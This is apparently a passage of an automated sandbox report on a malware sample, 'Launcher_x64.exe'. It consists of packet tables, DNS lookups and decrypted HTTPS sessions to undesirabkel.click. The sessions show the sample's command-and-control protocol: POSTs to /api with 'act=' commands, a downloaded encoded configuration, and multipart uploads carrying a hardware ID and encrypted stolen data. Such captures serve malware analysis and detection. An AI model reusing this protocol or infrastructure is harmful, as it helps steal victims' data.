Dec 31, 2024 17:37:29.898221016 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.898237944 CET	49742	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:29.898243904 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:53.470264912 CET	65531	53	192.168.2.4	162.159.36.2
Dec 31, 2024 17:37:53.475059032 CET	53	65531	162.159.36.2	192.168.2.4
Dec 31, 2024 17:37:53.475128889 CET	65531	53	192.168.2.4	162.159.36.2
Dec 31, 2024 17:37:53.479945898 CET	53	65531	162.159.36.2	192.168.2.4
Dec 31, 2024 17:37:53.948426962 CET	65531	53	192.168.2.4	162.159.36.2
Dec 31, 2024 17:37:53.954137087 CET	53	65531	162.159.36.2	192.168.2.4
Dec 31, 2024 17:37:53.954195976 CET	65531	53	192.168.2.4	162.159.36.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 17:37:09.693250895 CET	56056	53	192.168.2.4	1.1.1.1
Dec 31, 2024 17:37:09.713295937 CET	53	56056	1.1.1.1	192.168.2.4
Dec 31, 2024 17:37:53.469634056 CET	53	64016	162.159.36.2	192.168.2.4
Dec 31, 2024 17:37:53.986955881 CET	53	57352	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 17:37:09.693250895 CET	192.168.2.4	1.1.1.1	0x7570	Standard query (0)	undesirabkel.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 17:37:09.713295937 CET	1.1.1.1	192.168.2.4	0x7570	No error (0)	undesirabkel.click		188.114.97.3	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:37:09.713295937 CET	1.1.1.1	192.168.2.4	0x7570	No error (0)	undesirabkel.click		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

undesirabkel.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.97.3	443	7372	C:\Users\user\Desktop\Launcher_x64.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:37:10 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: undesirabkel.click
2024-12-31 16:37:10 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-31 16:37:10 UTC	1129	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:37:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2m6c9mqt0g30ugddenc86joq7f; expires=Sat, 26 Apr 2025 10:23:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kOcQQzXVVR5m0Nn%2B%2FUSM0Lycl1%2FY94S3YobatSgfBGut7XagEZBebUEfBOmWUcvKEleEMm8gAaqKy4IfwMKmo0rvC6M5Xb8TgfZl3dDEr8jjc4g8%2FFN4Wj5IBLji1b6N9CMqnTo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb1540e0dc402-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1481&rtt_var=563&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1928665&cwnd=167&unsent_bytes=0&cid=89e7628bde0ae077&ts=487&x=0"
2024-12-31 16:37:10 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-31 16:37:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	188.114.97.3	443	7372	C:\Users\user\Desktop\Launcher_x64.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:37:11 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: undesirabkel.click
2024-12-31 16:37:11 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--swetamubcoyu&j=
2024-12-31 16:37:11 UTC	1133	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:37:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=enp1jfhntln4oiiv0pfvam4b2v; expires=Sat, 26 Apr 2025 10:23:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fNtR5YZ1WluhJMp%2FFabtT7SGfvw2I%2BzNKb8ghc9UgrDl57OGh7qnqoC%2BDzIfDb%2BnqLScxUn7upUQDwaCN%2Bc1lxAoVpAv8SbBGA4fIklnIOaQXDphkBLfB%2BHuFdZQ75ZtjFfhhXE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb15ad99780d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1519&rtt_var=639&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=956&delivery_rate=1922317&cwnd=232&unsent_bytes=0&cid=45b1b7a52898a1d9&ts=449&x=0"
2024-12-31 16:37:11 UTC	236	IN	Data Raw: 34 39 39 34 0d 0a 69 4f 67 6c 4f 55 30 48 79 67 70 54 51 6f 31 2f 44 51 48 2b 55 32 79 54 32 55 68 41 6f 75 4a 37 63 57 55 35 44 76 6c 69 66 52 2f 7a 79 6c 4d 62 64 7a 50 6d 4b 43 41 6e 72 30 56 35 63 34 73 32 51 4c 47 34 4c 47 4b 59 68 42 6f 64 46 6c 77 69 32 78 51 51 50 62 4b 4f 52 46 55 2b 59 75 59 6f 4e 6a 71 76 52 56 5a 36 33 44 59 43 73 65 4e 71 4a 63 69 41 47 68 30 48 57 47 57 57 45 68 46 38 34 49 52 43 55 53 68 6b 72 6d 73 2f 4c 2b 67 61 61 47 43 55 50 51 58 2b 73 53 56 69 6a 73 41 65 43 30 63 44 4c 4c 51 48 43 58 37 46 69 56 5a 53 62 33 72 6d 63 58 45 6e 34 31 30 33 49 35 38 32 44 76 2b 2f 4c 43 76 4b 69 68 4d 56 42 6c 31 6b 69 51 73 62 64 2b 43 4b 51 56 41 69 62 62 70 6d 4e 53 6a 6a 48 47 Data Ascii: 4994iOglOU0HygpTQo1/DQH+U2yT2UhAouJ7cWU5DvlifR/zylMbdzPmKCAnr0V5c4s2QLG4LGKYhBodFlwi2xQQPbKORFU+YuYoNjqvRVZ63DYCseNqJciAGh0HWGWWEhF84IRCUShkrms/L+gaaGCUPQX+sSVijsAeC0cDLLQHCX7FiVZSb3rmcXEn4103I582Dv+/LCvKihMVBl1kiQsbd+CKQVAibbpmNSjjHG
2024-12-31 16:37:11 UTC	1369	IN	Data Raw: 4a 67 33 48 39 4f 39 71 4e 71 65 6f 44 54 4b 78 41 57 53 6e 6d 57 45 42 6b 39 39 63 52 65 47 79 68 70 36 44 42 78 4b 4f 4d 54 61 6d 43 54 4e 67 2f 78 71 53 55 69 77 34 67 52 46 77 31 55 59 35 51 4f 46 58 72 69 67 30 42 55 4b 47 32 75 5a 7a 4a 67 6f 56 31 6f 65 39 78 70 54 74 47 72 4b 53 48 55 6a 51 68 54 47 42 56 31 32 77 63 54 50 62 4c 4b 51 56 55 75 61 4b 68 36 4f 53 76 6b 47 48 31 6f 6c 54 77 44 38 62 59 67 4c 63 4f 41 48 68 6b 4e 56 47 61 66 44 52 4a 37 36 6f 6f 48 46 57 39 69 73 43 68 70 59 4d 77 59 66 32 53 51 4a 30 7a 4c 2b 7a 56 73 32 63 41 65 48 30 63 44 4c 4a 4d 46 48 48 37 68 68 55 52 54 4a 48 65 6f 65 6a 63 74 36 67 39 70 5a 70 49 37 44 65 4f 78 4a 43 54 44 69 52 49 61 41 6c 78 6f 32 30 35 66 65 76 4c 4b 48 78 73 4f 61 4b 4e 6b 4f 7a 66 76 58 Data Ascii: Jg3H9O9qNqeoDTKxAWSnmWEBk99cReGyhp6DBxKOMTamCTNg/xqSUiw4gRFw1UY5QOFXrig0BUKG2uZzJgoV1oe9xpTtGrKSHUjQhTGBV12wcTPbLKQVUuaKh6OSvkGH1olTwD8bYgLcOAHhkNVGafDRJ76ooHFW9isChpYMwYf2SQJ0zL+zVs2cAeH0cDLJMFHH7hhURTJHeoejct6g9pZpI7DeOxJCTDiRIaAlxo205fevLKHxsOaKNkOzfvX
2024-12-31 16:37:11 UTC	1369	IN	Data Raw: 78 41 75 4f 33 49 43 54 50 6a 52 56 54 53 52 74 72 67 30 42 48 50 63 43 4a 55 31 67 6c 4a 35 31 72 50 79 37 6f 43 79 39 38 30 69 68 4f 39 72 64 71 65 6f 43 4e 47 42 73 42 53 57 4f 57 41 78 46 7a 35 59 39 49 55 79 39 6c 70 57 30 31 4b 2b 51 65 59 6d 65 4f 4f 77 37 35 76 69 73 6f 79 73 42 58 55 77 42 44 4c 4d 4e 41 4c 6d 72 68 79 48 4a 59 49 57 75 76 66 6e 45 2f 6f 51 51 76 5a 4a 42 78 56 72 47 32 49 69 66 46 6a 78 67 5a 43 56 35 6d 6c 77 67 52 66 76 69 46 51 31 73 6a 62 61 4a 6c 50 79 54 6e 46 47 52 6f 6d 6a 45 50 2b 2f 74 6b 59 73 65 59 57 55 74 48 62 32 75 58 44 52 41 2f 33 34 6c 4a 56 53 68 7a 36 48 64 2f 4f 61 38 61 59 79 50 45 63 51 4c 34 75 79 45 6f 78 49 41 65 48 67 4a 59 61 35 67 4e 47 48 66 6b 6a 55 4e 58 4a 6d 69 75 61 44 59 6b 36 67 39 71 61 70 Data Ascii: xAuO3ICTPjRVTSRtrg0BHPcCJU1glJ51rPy7oCy980ihO9rdqeoCNGBsBSWOWAxFz5Y9IUy9lpW01K+QeYmeOOw75visoysBXUwBDLMNALmrhyHJYIWuvfnE/oQQvZJBxVrG2IifFjxgZCV5mlwgRfviFQ1sjbaJlPyTnFGRomjEP+/tkYseYWUtHb2uXDRA/34lJVShz6Hd/Oa8aYyPEcQL4uyEoxIAeHgJYa5gNGHfkjUNXJmiuaDYk6g9qap
2024-12-31 16:37:11 UTC	1369	IN	Data Raw: 74 54 78 69 33 38 34 41 55 77 42 58 4c 4d 4e 41 46 6e 54 34 68 45 6c 53 49 6d 4f 67 62 7a 38 74 35 42 74 6b 5a 4a 73 33 41 2f 6d 32 4c 79 48 42 68 42 4d 42 42 46 42 6d 6c 67 70 66 4d 36 71 4e 58 78 74 33 4a 59 39 6b 47 44 44 30 44 33 6b 6a 67 33 38 58 73 62 77 6d 59 70 6a 41 47 68 77 4f 56 47 53 54 44 78 42 35 35 49 78 42 56 69 70 71 6f 6e 6f 35 4c 75 49 57 59 47 69 4f 4d 51 50 31 74 79 34 71 79 34 70 5a 58 55 64 63 64 4e 74 59 58 30 6a 6e 68 55 64 59 4f 53 57 33 4a 69 68 67 36 42 45 76 4f 39 77 39 41 50 47 30 4a 69 37 4c 69 42 67 66 43 56 78 70 6b 67 67 58 62 2b 75 4f 54 31 6f 68 61 71 6c 73 4e 43 58 72 47 6d 74 6c 6b 33 46 41 73 62 77 79 59 70 6a 41 4e 6a 51 79 47 55 32 68 51 41 41 7a 38 38 70 41 56 32 38 39 36 47 51 79 4c 4f 63 53 61 57 71 51 4f 77 66 Data Ascii: tTxi384AUwBXLMNAFnT4hElSImOgbz8t5BtkZJs3A/m2LyHBhBMBBFBmlgpfM6qNXxt3JY9kGDD0D3kjg38XsbwmYpjAGhwOVGSTDxB55IxBVipqono5LuIWYGiOMQP1ty4qy4pZXUdcdNtYX0jnhUdYOSW3Jihg6BEvO9w9APG0Ji7LiBgfCVxpkggXb+uOT1ohaqlsNCXrGmtlk3FAsbwyYpjANjQyGU2hQAAz88pAV2896GQyLOcSaWqQOwf
2024-12-31 16:37:11 UTC	1369	IN	Data Raw: 63 53 44 48 52 59 49 57 6d 32 64 45 68 68 30 2b 49 52 4b 56 43 64 74 6f 57 6b 31 4a 65 49 62 59 32 6d 64 4e 67 44 2f 73 32 70 73 67 49 63 42 55 31 38 62 54 59 73 62 44 57 76 6e 71 30 70 55 62 33 72 6d 63 58 45 6e 34 31 30 33 49 35 55 6a 43 76 79 70 49 79 58 4f 6a 78 6f 42 42 6c 5a 6e 69 51 63 51 65 65 32 47 51 56 51 70 5a 4b 31 69 50 53 66 71 46 6d 42 76 33 48 39 4f 39 71 4e 71 65 6f 43 75 45 67 41 51 57 47 4b 51 46 67 51 39 39 63 52 65 47 79 68 70 36 44 42 78 49 2b 51 57 61 32 4f 51 4d 51 72 38 75 7a 67 74 78 34 63 51 47 42 56 52 61 35 77 4c 46 33 62 6c 6a 46 56 58 49 58 65 74 65 69 4e 67 6f 56 31 6f 65 39 78 70 54 73 65 38 4f 6a 4c 44 77 69 67 46 42 45 31 6e 6c 67 78 66 59 71 53 54 42 31 77 6a 4a 66 41 6f 4e 79 2f 6d 48 6d 42 69 6c 54 30 44 39 4c 49 76 Data Ascii: cSDHRYIWm2dEhh0+IRKVCdtoWk1JeIbY2mdNgD/s2psgIcBU18bTYsbDWvnq0pUb3rmcXEn4103I5UjCvypIyXOjxoBBlZniQcQee2GQVQpZK1iPSfqFmBv3H9O9qNqeoCuEgAQWGKQFgQ99cReGyhp6DBxI+QWa2OQMQr8uzgtx4cQGBVRa5wLF3bljFVXIXeteiNgoV1oe9xpTse8OjLDwigFBE1nlgxfYqSTB1wjJfAoNy/mHmBilT0D9LIv
2024-12-31 16:37:11 UTC	1369	IN	Data Raw: 49 64 4e 56 68 33 32 78 39 52 5a 4b 71 4e 53 78 74 33 4a 61 74 76 4d 69 48 6c 46 47 4e 73 6d 7a 55 63 2b 37 77 34 49 38 47 4c 46 42 38 48 56 6d 47 52 41 52 5a 77 35 6f 64 41 58 43 42 67 36 43 5a 78 4a 2f 64 64 4e 79 4f 39 50 41 58 39 34 48 42 69 33 38 34 41 55 77 42 58 4c 4d 4e 41 48 33 66 76 67 45 70 59 49 47 61 36 61 54 63 79 37 78 42 6c 63 5a 59 36 43 2f 79 32 4a 79 48 47 68 68 49 66 46 56 4a 73 6d 41 74 66 4d 36 71 4e 58 78 74 33 4a 59 74 2f 4a 79 72 6f 45 58 6c 6f 6e 54 49 59 2f 4b 74 71 62 49 43 52 48 67 4a 48 41 33 71 4c 46 78 68 69 70 4a 4d 48 58 43 4d 6c 38 43 67 33 4b 65 6b 61 61 57 32 4f 4e 41 6a 2b 74 43 4d 72 78 49 67 61 45 77 4e 66 61 35 34 44 45 33 62 74 69 55 68 66 4a 6d 75 68 5a 33 46 75 72 78 70 33 49 38 52 78 4c 2b 71 34 4a 69 2b 41 6e Data Ascii: IdNVh32x9RZKqNSxt3JatvMiHlFGNsmzUc+7w4I8GLFB8HVmGRARZw5odAXCBg6CZxJ/ddNyO9PAX94HBi384AUwBXLMNAH3fvgEpYIGa6aTcy7xBlcZY6C/y2JyHGhhIfFVJsmAtfM6qNXxt3JYt/JyroEXlonTIY/KtqbICRHgJHA3qLFxhipJMHXCMl8Cg3KekaaW2ONAj+tCMrxIgaEwNfa54DE3btiUhfJmuhZ3Furxp3I8RxL+q4Ji+An
2024-12-31 16:37:11 UTC	1369	IN	Data Raw: 62 49 74 73 48 42 7a 32 79 79 6d 64 51 4f 57 43 76 66 6e 4d 56 37 42 4e 68 5a 49 70 78 45 63 37 31 61 69 33 61 77 45 45 71 48 68 74 72 6c 30 42 48 50 66 2b 4e 52 31 77 31 63 36 39 6b 49 43 76 69 45 55 31 73 6d 79 63 4e 2f 72 67 37 4b 34 79 4c 46 46 4e 4a 47 32 75 44 51 45 63 39 78 59 31 52 57 41 42 6d 75 57 46 78 62 71 38 61 65 53 50 45 63 54 43 78 71 53 6b 79 77 34 38 49 4c 55 63 44 64 61 56 41 46 47 76 74 6d 6b 52 4e 4a 47 69 6b 65 51 39 67 74 30 6b 39 4d 63 35 6a 58 4f 37 37 4e 52 32 4f 77 42 68 54 58 32 4a 31 32 78 5a 66 4a 62 6a 45 42 30 6c 76 50 65 67 76 4d 6a 4c 39 47 32 78 31 6e 33 59 77 7a 35 77 38 4b 4d 65 51 48 67 51 49 47 79 4c 62 44 31 38 6c 30 38 70 4f 58 44 52 30 76 6d 55 68 4a 36 38 69 49 53 4f 45 63 56 61 78 6a 69 6b 73 7a 6f 63 50 41 6b Data Ascii: bItsHBz2yymdQOWCvfnMV7BNhZIpxEc71ai3awEEqHhtrl0BHPf+NR1w1c69kICviEU1smycN/rg7K4yLFFNJG2uDQEc9xY1RWABmuWFxbq8aeSPEcTCxqSkyw48ILUcDdaVAFGvtmkRNJGikeQ9gt0k9Mc5jXO77NR2OwBhTX2J12xZfJbjEB0lvPegvMjL9G2x1n3Ywz5w8KMeQHgQIGyLbD18l08pOXDR0vmUhJ68iISOEcVaxjikszocPAk
2024-12-31 16:37:11 UTC	1369	IN	Data Raw: 54 42 64 73 35 34 59 48 46 57 39 77 6f 32 51 33 4c 66 70 53 66 6e 57 66 4a 77 6d 39 73 7a 73 76 7a 4d 41 6d 58 55 64 44 4c 4d 4e 41 4b 6e 37 6b 68 45 42 4e 50 69 69 49 59 7a 30 6a 34 78 78 6f 49 39 4a 78 43 4c 48 6a 65 57 79 41 68 41 68 54 58 77 73 2b 77 46 56 4d 4b 72 72 59 57 42 55 32 4a 62 34 6f 61 58 4b 68 58 58 30 6a 78 48 46 4a 38 71 6b 34 4a 4d 4f 57 47 6c 51 35 5a 57 32 57 44 31 4e 7a 34 59 70 41 53 7a 6c 2b 35 47 41 79 4f 76 55 6a 55 55 69 51 4e 77 6e 72 76 43 77 45 34 4d 42 58 55 77 67 62 4e 4b 4a 41 56 7a 33 56 78 41 64 44 62 7a 33 6f 58 54 49 75 34 52 70 35 63 74 45 5a 4c 63 75 42 61 41 37 48 6c 56 73 6e 41 45 74 39 6b 41 30 54 50 61 54 4b 51 52 74 33 4e 65 59 6f 4e 54 47 76 52 54 38 78 78 32 52 64 70 75 74 34 50 59 36 5a 57 51 56 48 41 7a 37 Data Ascii: TBds54YHFW9wo2Q3LfpSfnWfJwm9szsvzMAmXUdDLMNAKn7khEBNPiiIYz0j4xxoI9JxCLHjeWyAhAhTXws+wFVMKrrYWBU2Jb4oaXKhXX0jxHFJ8qk4JMOWGlQ5ZW2WD1Nz4YpASzl+5GAyOvUjUUiQNwnrvCwE4MBXUwgbNKJAVz3VxAdDbz3oXTIu4Rp5ctEZLcuBaA7HlVsnAEt9kA0TPaTKQRt3NeYoNTGvRT8xx2Rdput4PY6ZWQVHAz7
2024-12-31 16:37:11 UTC	1369	IN	Data Raw: 2f 50 4b 55 52 74 33 4e 75 59 6f 49 32 43 33 58 53 68 74 6b 54 41 4e 2f 37 67 34 4d 4d 61 44 44 78 42 41 5a 56 4b 2b 44 52 4a 34 35 49 31 35 5a 51 35 76 75 47 55 2b 4a 36 30 39 61 48 57 66 44 7a 44 47 71 69 30 79 67 71 59 61 42 51 51 62 49 74 73 59 58 79 57 71 71 30 31 4c 49 6d 71 76 4b 68 45 6e 2b 52 34 76 4c 64 77 31 54 71 6e 37 44 79 2f 4e 68 52 63 55 52 58 70 6d 69 77 30 51 65 71 69 71 51 45 30 73 4a 65 59 6f 50 57 43 33 58 57 35 70 6a 44 77 42 39 76 63 74 4f 4d 66 41 56 31 4d 4a 47 7a 54 62 41 52 56 74 35 34 56 41 46 79 6c 72 70 69 67 75 62 76 5a 64 65 53 50 45 59 6b 43 78 71 57 70 36 67 4d 63 61 41 52 56 64 62 34 30 44 57 45 50 55 70 31 56 63 50 32 62 71 57 54 77 6b 2b 51 68 73 63 35 73 50 4d 4e 79 70 4c 54 4c 44 77 69 67 46 42 46 74 69 6e 45 42 52 Data Ascii: /PKURt3NuYoI2C3XShtkTAN/7g4MMaDDxBAZVK+DRJ45I15ZQ5vuGU+J609aHWfDzDGqi0ygqYaBQQbItsYXyWqq01LImqvKhEn+R4vLdw1Tqn7Dy/NhRcURXpmiw0QeqiqQE0sJeYoPWC3XW5pjDwB9vctOMfAV1MJGzTbARVt54VAFylrpigubvZdeSPEYkCxqWp6gMcaARVdb40DWEPUp1VcP2bqWTwk+Qhsc5sPMNypLTLDwigFBFtinEBR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	188.114.97.3	443	7372	C:\Users\user\Desktop\Launcher_x64.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:37:12 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GHSI1GIXN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18116 Host: undesirabkel.click
2024-12-31 16:37:12 UTC	15331	OUT	Data Raw: 2d 2d 47 48 53 49 31 47 49 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 39 32 34 39 30 43 35 36 41 46 45 30 31 37 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 47 48 53 49 31 47 49 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 48 53 49 31 47 49 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 0d 0a 2d 2d 47 48 53 49 31 47 49 58 4e 0d 0a 43 6f 6e 74 65 Data Ascii: --GHSI1GIXNContent-Disposition: form-data; name="hwid"5D92490C56AFE01792A467F615F074C7--GHSI1GIXNContent-Disposition: form-data; name="pid"2--GHSI1GIXNContent-Disposition: form-data; name="lid"LPnhqo--swetamubcoyu--GHSI1GIXNConte
2024-12-31 16:37:12 UTC	2785	OUT	Data Raw: 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
2024-12-31 16:37:16 UTC	1136	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:37:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=99jggtj64s7ktsgi2hbifen886; expires=Sat, 26 Apr 2025 10:23:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ic6EHd%2FO3b%2BawpRCafbDd%2FHSZ3qwdPdi7SAGwgyWUp46pCFxMS3QUZ%2FUJywzcJz9mcDNfQyKtloEs8mlRH9wNBKIM8SRNv5k3cH9Fvbzm7x%2FWg1oJWR340msyNuX9gvNNYql424%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb162b9ddde92-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1511&rtt_var=571&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19071&delivery_rate=1910994&cwnd=245&unsent_bytes=0&cid=66d4c83d85864d36&ts=3759&x=0"
2024-12-31 16:37:16 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 16:37:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	188.114.97.3	443	7372	C:\Users\user\Desktop\Launcher_x64.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:37:17 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=98XA9EBX2WNXENO8FY8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8797 Host: undesirabkel.click
2024-12-31 16:37:17 UTC	8797	OUT	Data Raw: 2d 2d 39 38 58 41 39 45 42 58 32 57 4e 58 45 4e 4f 38 46 59 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 39 32 34 39 30 43 35 36 41 46 45 30 31 37 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 39 38 58 41 39 45 42 58 32 57 4e 58 45 4e 4f 38 46 59 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 38 58 41 39 45 42 58 32 57 4e 58 45 4e 4f 38 46 59 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77 Data Ascii: --98XA9EBX2WNXENO8FY8Content-Disposition: form-data; name="hwid"5D92490C56AFE01792A467F615F074C7--98XA9EBX2WNXENO8FY8Content-Disposition: form-data; name="pid"2--98XA9EBX2WNXENO8FY8Content-Disposition: form-data; name="lid"LPnhqo--sw
